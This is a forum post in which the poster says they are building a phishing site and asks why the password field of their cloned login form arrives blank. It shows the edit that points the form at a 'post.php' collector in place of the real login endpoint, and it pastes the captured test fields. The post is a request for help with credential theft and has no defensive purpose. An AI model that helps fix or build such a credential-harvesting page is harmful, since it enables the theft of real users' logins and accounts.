(adsbygoogle = window.adsbygoogle || []).push({});
So i'm creating a phishing site, and everything works EXCEPT when you login on the phish and it sends the username and password in a new post, the password spot is blank.
I have the post.php and index.htm correct i do believe.
in the index, I have replaced this <form action="/auth/login/" id="memberloginForm" method="post"><input type="hidden" with this <form action="post.php" id="memberloginForm" method="post"><input type="hidden"
Im wondering if i need to do something else in index?
o9b9eiszxy4wrf7iiepz2f8=b47f9922b17d8db2688043137511fe1d
redirect=
token=a21e41ac695090f07a2c612f87401981
sid=18159eb48f2zpeii7frw4yxzsie9b95g
username=test
password=
signInButton=Log In
chap=253036e1232ebf70df88a74bdd395a4c
Thats what i get when i test it. As you can see, the password spot, is blank.
---------- Post added at 05:46 PM ---------- Previous post was at 03:12 PM ----------
pm me if no one wants to post on here please.